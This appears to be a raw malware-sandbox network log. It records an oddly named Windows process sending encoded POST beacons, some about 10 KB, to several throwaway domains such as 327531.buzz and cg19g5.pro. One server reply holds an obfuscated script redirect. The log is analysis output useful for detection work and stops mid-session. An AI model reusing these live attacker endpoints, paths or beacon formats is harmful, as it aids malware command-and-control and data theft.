                                                                                                            Dec 12, 2024 21:49:44.278641939 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.398540020 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:44.398679018 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.407048941 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.526804924 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654665947 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654725075 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654742956 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654891014 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.656727076 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.656893015 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.659216881 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.779045105 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:51.149918079 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.269850016 CET805002566.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:51.269964933 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.284840107 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.404591084 CET805002566.29.149.46192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 12, 2024 21:48:13.186500072 CET | 192.168.2.4 | 1.1.1.1 | 0x3163 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:48:29.942231894 CET | 192.168.2.4 | 1.1.1.1 | 0x2cfd | Standard query (0) | www.327531.buzz | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:05.404201984 CET | 192.168.2.4 | 1.1.1.1 | 0xe28a | Standard query (0) | www.cg19g5.pro | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:20.575575113 CET | 192.168.2.4 | 1.1.1.1 | 0x4bdb | Standard query (0) | www.hm35s.top | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:35.763248920 CET | 192.168.2.4 | 1.1.1.1 | 0xac80 | Standard query (0) | www.030002350.xyz | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:50.669728994 CET | 192.168.2.4 | 1.1.1.1 | 0xe263 | Standard query (0) | www.elitevibes.top | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 12, 2024 21:47:13.039526939 CET | 1.1.1.1 | 192.168.2.4 | 0x126f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:47:13.039526939 CET | 1.1.1.1 | 192.168.2.4 | 0x126f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:47:16.803337097 CET | 1.1.1.1 | 192.168.2.4 | 0x59cb | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 12, 2024 21:47:16.803337097 CET | 1.1.1.1 | 192.168.2.4 | 0x59cb | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:47:49.318325043 CET | 1.1.1.1 | 192.168.2.4 | 0xa516 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 12, 2024 21:47:49.318325043 CET | 1.1.1.1 | 192.168.2.4 | 0xa516 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:48:13.510210991 CET | 1.1.1.1 | 192.168.2.4 | 0x3163 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:48:13.510210991 CET | 1.1.1.1 | 192.168.2.4 | 0x3163 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:48:30.338310003 CET | 1.1.1.1 | 192.168.2.4 | 0x2cfd | No error (0) | www.327531.buzz | | 43.199.54.158 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:05.808686972 CET | 1.1.1.1 | 192.168.2.4 | 0xe28a | No error (0) | www.cg19g5.pro | | 154.88.22.105 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:21.050338984 CET | 1.1.1.1 | 192.168.2.4 | 0x4bdb | No error (0) | www.hm35s.top | hm35s.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 12, 2024 21:49:21.050338984 CET | 1.1.1.1 | 192.168.2.4 | 0x4bdb | No error (0) | hm35s.top | | 154.23.184.95 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:36.288496971 CET | 1.1.1.1 | 192.168.2.4 | 0xac80 | No error (0) | www.030002350.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false |
| Dec 12, 2024 21:49:51.147485018 CET | 1.1.1.1 | 192.168.2.4 | 0xe263 | No error (0) | www.elitevibes.top | | 66.29.149.46 | A (IP address) | IN (0x0001) | false |
Session ID: 0; Source IP: 192.168.2.4; Source Port: 49793; Destination IP: 104.21.95.160; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:48:13.648102045 CET; Bytes transferred: 506; Direction: OUT; Data:
GET /7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA= HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Timestamp: Dec 12, 2024 21:48:14.889898062 CET; Bytes transferred: 912; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:48:14 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlQX96oRm1u4q84MAIlilOHWBs91qFyKR9vQrP1hbBjv9hp0BZTwOnfY7K8czr2GBiyMuEu%2FMdgZwoMFtQAtC7y1n2N3sl0CJfwARvR80YGdpxGph%2BrW6HkQag2sJlPC"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f1092fb1ff0c470-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1517&rtt_var=758&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=506&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Timestamp: Dec 12, 2024 21:48:14.890084028 CET; Bytes transferred: 5; Direction: IN; Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


Session ID: 1; Source IP: 192.168.2.4; Source Port: 49829; Destination IP: 43.199.54.158; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:48:30.473103046 CET; Bytes transferred: 766; Direction: OUT; Data:
POST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZGRa9fU3IGwDHNU84k6zH9ku5biQIPuDLQ==


Session ID: 2; Source IP: 192.168.2.4; Source Port: 49835; Destination IP: 43.199.54.158; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:48:33.129990101 CET; Bytes transferred: 786; Direction: OUT; Data:
POST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5Pmb4CYDZ2voUrJT5MziscTUdKWEAsTo758CrA/QC2mlfrtUcpOSqQ/AC5ZlCXA4wqOWcgkYvQ5ycYX7aCNGFG4Ov0VtwXphWv+PmQ+K3w+ZCxA89Yaa7+4S+Hc31Rw+Q1HkgmPrZmpVbkV9AdkcrkFMTKQdGhYRYTL+P+E23N4uxx9V0=


Session ID: 3; Source IP: 192.168.2.4; Source Port: 49841; Destination IP: 43.199.54.158; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:48:35.793745041 CET; Bytes transferred: 10868; Direction: OUT; Data:
POST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Data Ascii: YdDTnh= [TRUNCATED]


Session ID: 4; Source IP: 192.168.2.4; Source Port: 49852; Destination IP: 43.199.54.158; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:48:38.456708908 CET; Bytes transferred: 508; Direction: OUT; Data:
GET /iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4


Session ID: 5; Source IP: 192.168.2.4; Source Port: 49913; Destination IP: 154.88.22.105; Destination Port: 80; PID: 5728; Process: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp: Dec 12, 2024 21:49:05.950001955 CET; Bytes transferred: 763; Direction: OUT; Data:
POST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=9ziv3/zvB1BtfEDQmD+rnWSAfg0Pdhd/Cdo7UzKHJ3DFJ8A+xd7uEmNWkUtLK2zf2y0KuOkMZCsa/PtUA0wbs8ySHmgMYCHs65qPxVvbyYZg4Epxz47O7y+L+mwaKs0WWkep2vIq+guZKTt4tUkksvlHCVzVyjwMy/frX+/YiGhmdSLHmD8S/O+ANxLJ4KLDiA==
Dec 12, 2024 21:49:07.463759899 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49923 | 154.88.22.105 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:08.616202116 CET | 783 | OUT | POST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCTFKdw+wYbuHmNWs0tOEWzA2191uLEMZCIa/KRUAnIctsyQPGgOViHs65qPxV79yYBg405xzZ7NzS+U9mwaOs0SWkfM2ukM+imZKTd4thElmvlFfFzL7zQF7vSoctrdtXlScUGd3ydFtOazQ2C91J2K5MPDIRSWQDces4T9ZMht4Ag=
Dec 12, 2024 21:49:10.154843092 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:09 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49930 | 154.88.22.105 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:11.309892893 CET | 10865 | OUT | POST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Dec 12, 2024 21:49:12.800817013 CET | 364 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49936 | 154.88.22.105 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:14.031729937 CET | 507 | OUT | GET /63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ= HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Dec 12, 2024 21:49:15.561419964 CET | 332 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:15 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9kYzIxLmNnMW82aC5wcm86NjY4OQ=c=')</script>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49952 | 154.23.184.95 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:21.185236931 CET | 760 | OUT | POST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=t5itM9IXjlQHPTwZ/j3kkIxKA6jLE68xrp9NDzMiGHgLu+tjxqFTAs/qrIGbJkEq2JP3tH+6N5pLmhkdL1OVJrHXNqQMPnTB4MQQoL0FBgW8SK18KKYrqr4m05SWn6YHFUYQMw78++gDGUB4QRN2StQLnmfPafK9SK4IBt0mhtK1EHvPqE1bWzBQvuik336hFg==
Dec 12, 2024 21:49:22.730657101 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49959 | 154.23.184.95 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:23.857618093 CET | 780 | OUT | POST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1ELg81jrotTNM/qz4GeGEEh2JCItCe6N4NLmj8dKCSWI7HRBKQOXHTB4MQQoLxeBhy8R7F8LrYqgL4n9ZSW1KYLFUYIM0ar+8YDGUR4RAN5ZtQFjmeqas6wI6pwG/pIj/CQIhiV71UMEzljyprQ60HoekU4aebtmYfEg4uoQTAZB6w=
Dec 12, 2024 21:49:25.373651028 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49967 | 154.23.184.95 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:26.526307106 CET | 10862 | OUT | POST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Data Ascii: YdDTnh=[TRUNCATED]
Dec 12, 2024 21:49:28.083762884 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:27 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a5f968-94"
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49973 | 154.23.184.95 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:29.204853058 CET | 506 | OUT | GET /ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
Host: www.hm35s.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Dec 12, 2024 21:49:30.751588106 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:30 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a5f968-94"
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49990 | 161.97.142.144 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:36.423399925 CET | 772 | OUT | POST /1a7n/ HTTP/1.1
Host: www.030002350.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.030002350.xyz
Referer: http://www.030002350.xyz/1a7n/
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 203
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
